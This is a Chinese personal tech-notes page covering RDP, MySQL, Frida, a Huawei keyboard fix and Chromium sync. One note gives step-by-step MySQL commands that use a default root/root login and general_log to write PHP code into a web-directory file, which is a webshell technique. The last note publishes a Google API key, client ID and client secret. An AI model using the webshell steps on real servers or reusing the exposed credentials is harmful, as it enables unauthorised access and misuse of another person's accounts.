远程桌面,这可能是由于credssp加密oracle修正
组策略,然后选择计算机配置>管理模板>系统>凭据分配>加密Oracle修正(Encryption Oracle Remediation)
改成易受攻击(vulnerable)
组策略,然后选择计算机配置>管理模板>系统>凭据分配>加密Oracle修正(Encryption Oracle Remediation)
改成易受攻击(vulnerable)
其实不是什么新技术,记录下来.
PHPStudy环境.内网.root/root默认密码.
想当然的.就先用select XX into outfile XXXX
但是由于phpstudy开启了secure-file-priv导致无法outfile.
群里问了下,可以通过日志general_log的方式.默认是是OFF的
SHOW VARIABLES LIKE 'general%'
使用这个命令查询,然后执行下面的命令:
set global general_log = "ON";
set global general_log_file='D:\phpStudy\phpMyAdmin\xxx.php';
这样日志就写到web目录了.
后面,查询一下.结果,卡住了.不知道为什么.
select version()都可以执行,都可以写入php的log文件.
后来尝试phpmyadmin新建一个字段,直接插入一句话shell,这里执行的应该是insert语句.
CREATE TABLE IF NOT EXISTS `webshell` ( `shell` varchar(100) NOT NULL) ENGINE=MyISAM DEFAULT CHARSET=utf8;
INSERT INTO `webshell` (`shell`) VALUES ('<?php echo "test by kele";phpinfo();?>');
这样日志里面就有webshell了.
Frida总是崩溃.以为是最新版不兼容.换了旧版还是不行.
命令还是要记录下的.
pip install frida==11.0.12
英文输入状态下,自动输入推荐的单词.
比如我打的是"shanma",下方的联想词里面会出现3个候选词,中间一个将被选中.
接下来只要我打一个标点符号,就自动确认中间这个候选词.但是这个单词并不是我想要的.
比如我想输入test.shenma.com,会变成test.Sherman.com
找遍了整个设置,也没找出来怎么关闭.
但是,其实百度输入法是没有这个问题的.
最终解决办法就是,换个皮肤就OK了.
搜索"华为怀旧皮肤1.0",下载使用.
在英文状态下,中英文切换键,右侧有个ABC带下划线的那种.
点击,使它下面没有下划线.就关闭了联想功能.
最坑的是就,
1),这狗B功能是默认开启的.
2),本地的几个皮肤都没有这个键,导致无法关闭此功能.但是网上下载的皮肤都有!
用上了chromium.但是因为没有API KEY,导致无法登录浏览器,无法同步书签栏.
参考这个文章,https://gist.github.com/cvan/44a6d60457b20133191bd7b104f9dcc4
申请属于自己的API KEY.
关键点就是上面URL里面提到的7和10.
申请好之后
管理员的命令行CMD下输入.
setx GOOGLE_API_KEY AIzaSyBwIKtzAADbKEXxKFki4-5335pRp6Dggq0
setx GOOGLE_DEFAULT_CLIENT_ID 461596714253-5hv1lml8olmag1n02boogjp1krnp95k4.apps.googleusercontent.com
setx GOOGLE_DEFAULT_CLIENT_SECRET qzx3tM5Z3Ole3UiBZfe7GVSw
上面这几个是我自己申请的